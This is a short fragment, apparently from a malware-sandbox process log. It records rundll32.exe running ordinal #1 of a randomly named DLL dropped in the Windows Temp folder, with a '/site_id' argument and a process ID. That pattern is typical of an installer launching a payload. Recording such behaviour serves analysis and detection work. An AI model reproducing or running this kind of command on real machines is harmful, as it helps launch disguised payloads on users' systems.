C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\nyFjvKGtfVGLAKAU\zwjTlmrA\GcgVJLc.dll",#1 /site_id 6686582⤵PID:6340
-